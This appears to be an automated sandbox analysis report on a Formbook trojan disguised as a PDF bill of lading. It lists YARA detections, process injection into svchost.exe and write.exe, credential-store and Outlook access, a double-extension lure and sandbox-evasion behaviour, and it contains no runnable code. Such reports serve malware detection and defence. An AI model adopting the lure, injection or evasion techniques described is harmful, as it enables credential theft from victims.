            Source: 00000005.00000002.4198331261.0000000005AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4200186991.00000000050F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2196592911.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2197276095.0000000006A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4197079082.00000000023B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4198283199.0000000004110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2195135804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/11
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\slashingJump to behavior
            Source: Bill Of Lading_MEDUVB935991.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: write.exe, 00000006.00000003.2372737299.0000000002903000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2372606436.00000000028E1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4197383900.0000000002903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Bill Of Lading_MEDUVB935991.pdf.exeReversingLabs: Detection: 55%
            Source: Bill Of Lading_MEDUVB935991.pdf.exeVirustotal: Detection: 56%
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeFile read: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Bill Of Lading_MEDUVB935991.pdf.exeStatic file information: File size 1326841 > 1048576
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2196173026.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196201954.0000000003619000.00000004.00000020.00020000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000005.00000002.4197765799.000000000176E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gNKNuXuipEBZec.exe, 00000005.00000002.4197078176.000000000020E000.00000002.00000001.01000000.00000005.sdmp, gNKNuXuipEBZec.exe, 00000007.00000000.2262529578.000000000020E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739800733.00000000048B0000.00000004.00001000.00020000.00000000.sdmp, Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1739474867.0000000004710000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2196687100.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2094619332.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2092717586.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2196687100.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4198585467.000000000469E000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4198585467.0000000004500000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2195652976.00000000041AF000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2197425924.0000000004352000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.4197383900.0000000002885000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4199021096.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, gNKNuXuipEBZec.exe, 00000007.00000002.4198548934.0000000002CBC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482548327.0000000037CAC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: Bill Of Lading_MEDUVB935991.pdf.exeStatic PE information: real checksum: 0xa2135 should be: 0x151d03
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041433C push eax; retn 5C94h1_2_00414328
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408810 push E8C19C57h; retf 1_2_00408817
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402221 push edi; retf 1_2_00402235
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411A9A push 797FD1CCh; iretd 1_2_00411ABD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004122A3 push ebx; retf 1_2_004122A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00406BC7 push es; ret 1_2_00406BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040745F push esp; retf 1_2_00407466
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EC0F push eax; iretd 1_2_0041EC15
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004034B0 push eax; ret 1_2_004034B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D563 push 4EF1F631h; retf 1_2_0040D573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D532 push esi; retf 1_2_0040D544
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415DC3 push esi; ret 1_2_00415DCE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413D93 push 2370h; ret 1_2_00413DC7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A59C push cs; ret 1_2_0041A5A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00419E9A push esp; ret 1_2_00419E9F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0225F pushad ; ret 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C027FA pushad ; ret 1_2_03C027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx1_2_03C309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0283D push eax; iretd 1_2_03C02858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01368 push eax; iretd 1_2_03C01369
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C01065 push edi; ret 1_2_03C0108A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C018F3 push edx; iretd 1_2_03C01906
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B20CE0 push esp; ret 5_2_05B20CE5
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B11C30 push edi; iretd 5_2_05B11C23
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1CC02 push esi; ret 5_2_05B1CC14
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1CC09 push esi; ret 5_2_05B1CC14
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B0F656 push E8C19C57h; retf 5_2_05B0F65D
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1C985 push eax; iretd 5_2_05B1C986
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B188E0 push 797FD1CCh; iretd 5_2_05B18903
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B190E9 push ebx; retf 5_2_05B190EC

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses an obfuscated file name to hide its real file extension (double extension)
            Source: Possible double extension: pdf.exeStatic PE information: Bill Of Lading_MEDUVB935991.pdf.exe
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004440780_2_00444078
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeAPI/Special instruction interceptor: Address: 402365C
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 5132Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 4840Jump to behavior
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-84635
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-83633
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeAPI coverage: 3.0 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exeAPI coverage: 3.0 %
            Source: C:\Windows\SysWOW64\write.exe TID: 3236Thread sleep count: 5132 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 3236Thread sleep time: -10264000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 3236Thread sleep count: 4840 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 3236Thread sleep time: -9680000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe TID: 4040Thread sleep time: -38000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
